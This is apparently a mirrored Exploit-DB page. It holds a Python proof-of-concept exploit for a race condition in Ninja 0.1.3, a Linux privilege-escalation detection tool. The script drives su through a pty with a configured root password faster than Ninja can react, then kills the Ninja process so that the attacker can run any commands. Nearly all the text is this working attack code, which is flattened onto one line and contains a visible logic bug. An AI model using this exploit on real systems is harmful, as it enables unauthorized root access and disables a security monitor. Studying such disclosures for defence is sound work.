Ninja Privilege Escalation Detection and Prevention System 0.1.3 – Race Condition Privilege Escalation

• Exploit Database
• 125 阅读

• 作者： Ben Sheppard
  日期： 2015-04-29
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/36855/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83

  #[Title] Ninja privilege escalation detection and prevention system race condition #[Author] Ben 'highjack' Sheppard #[URL] http://highjack.github.io/ #[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected. #It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected. #The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish. #[Software Link] http://forkbomb.org/ninja/ #[Date] 29/04/2015 #[Version] 0.1.3 #[Tested on] Kali Linux #[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg   #See me hitting every open port, 'cause im banging on their system while I'm staying out of the court #https://www.youtube.com/watch?v=eA136fOsSeQ   import pty, os, sys, subprocess pid, fd = pty.fork()   #begin config user = "root" password= "mypassword" #change this :) command = "killall -9 ninja" #end config     def usage(): print """ @@@@@@@@@ @@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@ @@!@@@@@!!@@@@!@@@ @@!@@!@@@!@@ @@!!@@ !@!@!@!@!!@!!@!@!@ !@!!@!@!@!@! !@!@!! @!@!@!@!!!@!@! @!@!@@!@!@!@! !!@@!@!@!@!!@! @!@@!@! !!!@!!!!!!!!!! !!@!!!!!@!!!! !!!!!!@!!!!!!! !!@!!! !!:!!!!!::!! !!:!!:!!! !!:!!:!!!:!! !!: :!! :!:!:!:!::!: !:::!:!:!!!::!::!:!:!:!: :!:!:! :: ::: :: ::: :::::: :::::: : :::: ::: ::: ::: ::::: : : :: :: :: :: : : : ::: : : : :: :: : : ::: [Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition [Author] Ben 'highjack' Sheppard [URL] http://highjack.github.io/ [Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected. It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected. The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish. """   executions = 0 def check_procs(): p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE) p2 = subprocess.Popen(["grep", "root"],stdin=p1.stdout,stdout=subprocess.PIPE) p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE) output = p3.communicate()[0] if output != "": if executions != 0: sys.exit(0) return True else: return False   def kill_ninja(): if pid == 0: os.execvp("su", ["su", user, "-c", command]) elif pid > 0: try: os.read(fd, 1024) os.write(fd, password + "\n") os.read(fd,1024) os.wait() os.close(fd) except: usage() print "[+] Ninja is terminated" sys.exit(0)   while True: kill_ninja() if (check_procs == True): executions = executions + 1 kill_ninja()